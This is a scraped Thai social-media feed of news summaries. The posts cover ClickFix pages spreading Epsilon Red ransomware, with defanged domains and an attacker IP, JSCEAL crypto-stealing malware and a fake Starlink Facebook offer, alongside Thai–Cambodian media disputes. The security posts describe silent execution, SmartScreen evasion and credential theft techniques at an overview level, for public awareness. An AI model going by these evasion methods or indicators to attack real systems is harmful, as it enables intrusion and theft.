ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 100 มุมมอง 0 รีวิว
  • เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต'

    3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่

    1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ

    2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก

    3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน

    ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ

    ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป

    แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง

    อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น

    #Newskit
    เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต' 3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่ 1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ 2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก 3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น #Newskit
    0 ความคิดเห็น 0 การแบ่งปัน 166 มุมมอง 0 รีวิว
  • สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย

    อ่านต่อ..https://news1live.com/detail/9680000072588

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย อ่านต่อ..https://news1live.com/detail/9680000072588 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 417 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกคริปโต: JSCEAL มัลแวร์ที่ซ่อนตัวในโฆษณาและ JavaScript

    นักวิจัยจาก Check Point พบแคมเปญมัลแวร์ขนาดใหญ่ที่เริ่มต้นตั้งแต่มีนาคม 2024 โดยใช้ชื่อว่า “JSCEAL” ซึ่งมีเป้าหมายคือผู้ใช้แอปซื้อขายคริปโตและกระเป๋าเงินดิจิทัล โดยแฮกเกอร์สร้างแอปปลอมและเว็บไซต์หลอกลวงที่ดูเหมือนของจริง แล้วโปรโมตผ่านโฆษณาบน Facebook และแพลตฟอร์มอื่น ๆ

    เมื่อเหยื่อคลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่ให้ดาวน์โหลดไฟล์ติดตั้ง MSI ซึ่งเมื่อเปิดใช้งาน จะเริ่มกระบวนการเก็บข้อมูลระบบผ่าน PowerShell และสคริปต์ JavaScript ที่ซ่อนอยู่ในเว็บไซต์ จากนั้นจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของแฮกเกอร์ และหากพบว่าเครื่องมีข้อมูลสำคัญ ก็จะปล่อย payload สุดท้ายคือ JSCEAL ซึ่งทำงานผ่าน Node.js

    JSCEAL ใช้ไฟล์ JavaScript ที่ถูกคอมไพล์ด้วย V8 engine ของ Google ซึ่งทำให้โค้ดถูกซ่อนไว้อย่างแนบเนียนและหลบเลี่ยงการตรวจจับจากแอนติไวรัสได้อย่างมีประสิทธิภาพ

    JSCEAL เป็นมัลแวร์ที่ใช้ไฟล์ JavaScript แบบคอมไพล์เพื่อหลบเลี่ยงการตรวจจับ
    ใช้ฟีเจอร์ V8 JSC ของ Google เพื่อซ่อนโค้ด
    ทำให้แอนติไวรัสทั่วไปไม่สามารถวิเคราะห์ได้ก่อนการรันจริง

    แคมเปญนี้เริ่มตั้งแต่มีนาคม 2024 และยังคงแพร่กระจายอย่างต่อเนื่อง
    พบโฆษณาปลอมกว่า 35,000 รายการใน EU ภายในครึ่งแรกของปี 2025
    คาดว่ามีผู้ตกเป็นเหยื่อมากกว่า 10 ล้านคนทั่วโลก

    แฮกเกอร์ใช้โฆษณาบน Facebook เพื่อหลอกให้ติดตั้งแอปปลอม
    โฆษณาถูกโพสต์ผ่านบัญชีที่ถูกขโมยหรือสร้างใหม่
    เว็บไซต์ปลอมเลียนแบบบริการจริง เช่น TradingView

    ไฟล์ MSI ที่ดาวน์โหลดจะเปิดเว็บวิวไปยังเว็บไซต์จริงเพื่อหลอกเหยื่อ
    ใช้ msedge_proxy.exe เพื่อเปิดเว็บจริงควบคู่กับการติดตั้งมัลแวร์
    ทำให้เหยื่อไม่สงสัยว่ามีสิ่งผิดปกติเกิดขึ้น

    JSCEAL สามารถขโมยข้อมูลได้หลากหลายประเภท
    รหัสผ่าน, คุกกี้, seed phrase, ข้อมูล Telegram, ภาพหน้าจอ, keystroke
    สามารถดักจับเว็บทราฟฟิกและฝังสคริปต์ในเว็บไซต์ธนาคารหรือคริปโต

    มัลแวร์มีโครงสร้างแบบหลายชั้นและปรับเปลี่ยน payload ได้ตามสถานการณ์
    ใช้ fingerprinting scripts เพื่อประเมินความคุ้มค่าของเหยื่อก่อนปล่อย payload
    มีการตั้ง proxy ภายในเครื่องเพื่อดักข้อมูลแบบ real-time

    https://www.techradar.com/pro/security/major-new-malware-strain-targets-crypto-users-via-malicious-ads-heres-what-we-know-and-how-to-stay-safe
    🧠 เรื่องเล่าจากโลกคริปโต: JSCEAL มัลแวร์ที่ซ่อนตัวในโฆษณาและ JavaScript นักวิจัยจาก Check Point พบแคมเปญมัลแวร์ขนาดใหญ่ที่เริ่มต้นตั้งแต่มีนาคม 2024 โดยใช้ชื่อว่า “JSCEAL” ซึ่งมีเป้าหมายคือผู้ใช้แอปซื้อขายคริปโตและกระเป๋าเงินดิจิทัล โดยแฮกเกอร์สร้างแอปปลอมและเว็บไซต์หลอกลวงที่ดูเหมือนของจริง แล้วโปรโมตผ่านโฆษณาบน Facebook และแพลตฟอร์มอื่น ๆ เมื่อเหยื่อคลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่ให้ดาวน์โหลดไฟล์ติดตั้ง MSI ซึ่งเมื่อเปิดใช้งาน จะเริ่มกระบวนการเก็บข้อมูลระบบผ่าน PowerShell และสคริปต์ JavaScript ที่ซ่อนอยู่ในเว็บไซต์ จากนั้นจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของแฮกเกอร์ และหากพบว่าเครื่องมีข้อมูลสำคัญ ก็จะปล่อย payload สุดท้ายคือ JSCEAL ซึ่งทำงานผ่าน Node.js JSCEAL ใช้ไฟล์ JavaScript ที่ถูกคอมไพล์ด้วย V8 engine ของ Google ซึ่งทำให้โค้ดถูกซ่อนไว้อย่างแนบเนียนและหลบเลี่ยงการตรวจจับจากแอนติไวรัสได้อย่างมีประสิทธิภาพ ✅ JSCEAL เป็นมัลแวร์ที่ใช้ไฟล์ JavaScript แบบคอมไพล์เพื่อหลบเลี่ยงการตรวจจับ ➡️ ใช้ฟีเจอร์ V8 JSC ของ Google เพื่อซ่อนโค้ด ➡️ ทำให้แอนติไวรัสทั่วไปไม่สามารถวิเคราะห์ได้ก่อนการรันจริง ✅ แคมเปญนี้เริ่มตั้งแต่มีนาคม 2024 และยังคงแพร่กระจายอย่างต่อเนื่อง ➡️ พบโฆษณาปลอมกว่า 35,000 รายการใน EU ภายในครึ่งแรกของปี 2025 ➡️ คาดว่ามีผู้ตกเป็นเหยื่อมากกว่า 10 ล้านคนทั่วโลก ✅ แฮกเกอร์ใช้โฆษณาบน Facebook เพื่อหลอกให้ติดตั้งแอปปลอม ➡️ โฆษณาถูกโพสต์ผ่านบัญชีที่ถูกขโมยหรือสร้างใหม่ ➡️ เว็บไซต์ปลอมเลียนแบบบริการจริง เช่น TradingView ✅ ไฟล์ MSI ที่ดาวน์โหลดจะเปิดเว็บวิวไปยังเว็บไซต์จริงเพื่อหลอกเหยื่อ ➡️ ใช้ msedge_proxy.exe เพื่อเปิดเว็บจริงควบคู่กับการติดตั้งมัลแวร์ ➡️ ทำให้เหยื่อไม่สงสัยว่ามีสิ่งผิดปกติเกิดขึ้น ✅ JSCEAL สามารถขโมยข้อมูลได้หลากหลายประเภท ➡️ รหัสผ่าน, คุกกี้, seed phrase, ข้อมูล Telegram, ภาพหน้าจอ, keystroke ➡️ สามารถดักจับเว็บทราฟฟิกและฝังสคริปต์ในเว็บไซต์ธนาคารหรือคริปโต ✅ มัลแวร์มีโครงสร้างแบบหลายชั้นและปรับเปลี่ยน payload ได้ตามสถานการณ์ ➡️ ใช้ fingerprinting scripts เพื่อประเมินความคุ้มค่าของเหยื่อก่อนปล่อย payload ➡️ มีการตั้ง proxy ภายในเครื่องเพื่อดักข้อมูลแบบ real-time https://www.techradar.com/pro/security/major-new-malware-strain-targets-crypto-users-via-malicious-ads-heres-what-we-know-and-how-to-stay-safe
    0 ความคิดเห็น 0 การแบ่งปัน 132 มุมมอง 0 รีวิว
  • เรื่องเล่าจากอวกาศปลอม: เมื่อ Starlink ถูกแอบอ้างเพื่อหลอกเงินผู้บริโภค

    ช่วงกลางปี 2025 มีโฆษณาบน Facebook ที่อ้างว่าเสนอ “แพ็กเกจอินเทอร์เน็ต Starlink ตลอดชีพ” ในราคาเพียง $127 หรือแม้แต่ “แผนรายปี $67” พร้อมจานรับสัญญาณ Starlink Mini ฟรี ฟังดูคุ้มเกินจริงใช่ไหม? เพราะมันคือ “หลอกลวงเต็มรูปแบบ”2

    เมื่อผู้ใช้คลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่เลียนแบบหน้าตาและโลโก้ของ Starlink อย่างแนบเนียน เช่น “ministarnt.xyz” หรือ “starlinkoficial.com” ซึ่งใช้ภาพจริงและคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

    เว็บไซต์เหล่านี้หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตและที่อยู่จัดส่ง โดยไม่มีการส่งสินค้าใด ๆ หรือส่งอุปกรณ์ปลอมที่ไม่สามารถเชื่อมต่อกับดาวเทียมได้เลย บางรายยังถูกขโมยข้อมูลและพบธุรกรรมแปลก ๆ ในบัญชีธนาคารภายหลัง

    SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ และย้ำว่าโปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการเท่านั้น เช่น การแจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน

    มีการหลอกลวงผ่าน Facebook โดยอ้างว่าเป็นแพ็กเกจ Starlink ตลอดชีพ
    ราคาเพียง $127 หรือ $67 ต่อปี พร้อมจาน Starlink Mini ฟรี
    ดูเหมือนถูกมากเมื่อเทียบกับค่าบริการจริงที่ $120 ต่อเดือน

    เว็บไซต์ปลอมเลียนแบบหน้าตา Starlink อย่างแนบเนียน
    ใช้ชื่อโดเมนคล้ายของจริง เช่น “starlinkoficial.com”
    มีโลโก้ ภาพสินค้า และคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

    เมื่อผู้ใช้กรอกข้อมูล จะถูกขโมยเงินหรือข้อมูลส่วนตัว
    บางรายไม่ได้รับสินค้าเลย หรือได้อุปกรณ์ปลอมที่ใช้ไม่ได้
    พบธุรกรรมแปลก ๆ ในบัญชีหลังจากซื้อสินค้า

    SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้
    โปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการ
    ตัวอย่างโปรจริง: แจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน (มูลค่า $499)

    ผู้ใช้ทั่วโลกเริ่มร้องเรียนบนโซเชียลมีเดียตั้งแต่เดือนพฤษภาคม
    PCMag พบหลายรูปแบบของโฆษณาหลอกลวงเมื่อค้นคำว่า “Starlink” บน Facebook

    วิธีตรวจสอบว่าโปรโมชั่นจริงหรือไม่
    เข้าเว็บไซต์ทางการของบริษัทเพื่อตรวจสอบ
    ตรวจสอบบัญชีโซเชียลมีเดียที่ได้รับการยืนยัน
    โทรสอบถามฝ่ายบริการลูกค้าโดยตรง

    https://www.techspot.com/news/108874-viral-lifetime-starlink-offer-facebook-total-scam.html
    🧠 เรื่องเล่าจากอวกาศปลอม: เมื่อ Starlink ถูกแอบอ้างเพื่อหลอกเงินผู้บริโภค ช่วงกลางปี 2025 มีโฆษณาบน Facebook ที่อ้างว่าเสนอ “แพ็กเกจอินเทอร์เน็ต Starlink ตลอดชีพ” ในราคาเพียง $127 หรือแม้แต่ “แผนรายปี $67” พร้อมจานรับสัญญาณ Starlink Mini ฟรี ฟังดูคุ้มเกินจริงใช่ไหม? เพราะมันคือ “หลอกลวงเต็มรูปแบบ”2 เมื่อผู้ใช้คลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่เลียนแบบหน้าตาและโลโก้ของ Starlink อย่างแนบเนียน เช่น “ministarnt.xyz” หรือ “starlinkoficial.com” ซึ่งใช้ภาพจริงและคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ เว็บไซต์เหล่านี้หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตและที่อยู่จัดส่ง โดยไม่มีการส่งสินค้าใด ๆ หรือส่งอุปกรณ์ปลอมที่ไม่สามารถเชื่อมต่อกับดาวเทียมได้เลย บางรายยังถูกขโมยข้อมูลและพบธุรกรรมแปลก ๆ ในบัญชีธนาคารภายหลัง SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ และย้ำว่าโปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการเท่านั้น เช่น การแจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน ✅ มีการหลอกลวงผ่าน Facebook โดยอ้างว่าเป็นแพ็กเกจ Starlink ตลอดชีพ ➡️ ราคาเพียง $127 หรือ $67 ต่อปี พร้อมจาน Starlink Mini ฟรี ➡️ ดูเหมือนถูกมากเมื่อเทียบกับค่าบริการจริงที่ $120 ต่อเดือน ✅ เว็บไซต์ปลอมเลียนแบบหน้าตา Starlink อย่างแนบเนียน ➡️ ใช้ชื่อโดเมนคล้ายของจริง เช่น “starlinkoficial.com” ➡️ มีโลโก้ ภาพสินค้า และคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ ✅ เมื่อผู้ใช้กรอกข้อมูล จะถูกขโมยเงินหรือข้อมูลส่วนตัว ➡️ บางรายไม่ได้รับสินค้าเลย หรือได้อุปกรณ์ปลอมที่ใช้ไม่ได้ ➡️ พบธุรกรรมแปลก ๆ ในบัญชีหลังจากซื้อสินค้า ✅ SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ ➡️ โปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการ ➡️ ตัวอย่างโปรจริง: แจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน (มูลค่า $499) ✅ ผู้ใช้ทั่วโลกเริ่มร้องเรียนบนโซเชียลมีเดียตั้งแต่เดือนพฤษภาคม ➡️ PCMag พบหลายรูปแบบของโฆษณาหลอกลวงเมื่อค้นคำว่า “Starlink” บน Facebook ✅ วิธีตรวจสอบว่าโปรโมชั่นจริงหรือไม่ ➡️ เข้าเว็บไซต์ทางการของบริษัทเพื่อตรวจสอบ ➡️ ตรวจสอบบัญชีโซเชียลมีเดียที่ได้รับการยืนยัน ➡️ โทรสอบถามฝ่ายบริการลูกค้าโดยตรง https://www.techspot.com/news/108874-viral-lifetime-starlink-offer-facebook-total-scam.html
    WWW.TECHSPOT.COM
    That viral lifetime Starlink offer on Facebook is a total scam
    The latest scam making the rounds on Facebook promises a lifetime subscription to SpaceX's Starlink satellite Internet service for as low as $127 – roughly as much...
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • ผอ.รพ.สรรพสิทธิประสงค์ แจงปมประกาศงดบริการ ย้ำความปลอดภัยบุคลากร-ผู้ป่วยสำคัญควบคู่มนุษยธรรม
    https://www.thai-tai.tv/news/20664/
    .
    #ไทยไทด้วย #รพสรรพสิทธิประสงค์ #บริการทางการแพทย์ #มนุษยธรรม #ผู้ป่วยฉุกเฉิน #สาธารณสุข #อุบลราชธานี #ข่าวปลอม #ความปลอดภัย #โรงพยาบาล
    ผอ.รพ.สรรพสิทธิประสงค์ แจงปมประกาศงดบริการ ย้ำความปลอดภัยบุคลากร-ผู้ป่วยสำคัญควบคู่มนุษยธรรม https://www.thai-tai.tv/news/20664/ . #ไทยไทด้วย #รพสรรพสิทธิประสงค์ #บริการทางการแพทย์ #มนุษยธรรม #ผู้ป่วยฉุกเฉิน #สาธารณสุข #อุบลราชธานี #ข่าวปลอม #ความปลอดภัย #โรงพยาบาล
    0 ความคิดเห็น 0 การแบ่งปัน 66 มุมมอง 0 รีวิว
  • "หลวงตาสุจ" งานเข้า! "สายลับโซเชียล" สั่นสะเทือนกัมพูชา ชาวเน็ตเขมรเชื่อ "พระเสียม" ส่งข้อมูลลับให้ทหารไทย...รีบเผ่นไปแคนาดาหนีภัยทัวร์ลง!
    https://www.thai-tai.tv/news/20658/
    .
    #หลวงตาสุจ #สายลับ #กัมพูชา #โซเชียลมีเดีย #ข่าวปลอม #ชายแดนไทยกัมพูชา #พระชื่อดัง #แคนาดา #ฮุนเซน #ฮุนมาเนต #ไทยไท
    "หลวงตาสุจ" งานเข้า! "สายลับโซเชียล" สั่นสะเทือนกัมพูชา ชาวเน็ตเขมรเชื่อ "พระเสียม" ส่งข้อมูลลับให้ทหารไทย...รีบเผ่นไปแคนาดาหนีภัยทัวร์ลง! https://www.thai-tai.tv/news/20658/ . #หลวงตาสุจ #สายลับ #กัมพูชา #โซเชียลมีเดีย #ข่าวปลอม #ชายแดนไทยกัมพูชา #พระชื่อดัง #แคนาดา #ฮุนเซน #ฮุนมาเนต #ไทยไท
    0 ความคิดเห็น 0 การแบ่งปัน 68 มุมมอง 0 รีวิว
  • ดีอีสู้ศึกไซเบอร์เขมร! เฝ้าระวังข่าวปลอม 24 ชม. พร้อมตอบโต้ป้องกันข้อมูลไทย ยันระบบมั่นคงปลอดภัย ปิดช่องโจมตี ฝั่งกลาโหมสั่งระงับร่วมมือทางทหารกับกัมพูชาชั่วคราว
    .
    อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000072317

    #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ดีอีสู้ศึกไซเบอร์เขมร! เฝ้าระวังข่าวปลอม 24 ชม. พร้อมตอบโต้ป้องกันข้อมูลไทย ยันระบบมั่นคงปลอดภัย ปิดช่องโจมตี ฝั่งกลาโหมสั่งระงับร่วมมือทางทหารกับกัมพูชาชั่วคราว . อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000072317 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Haha
    4
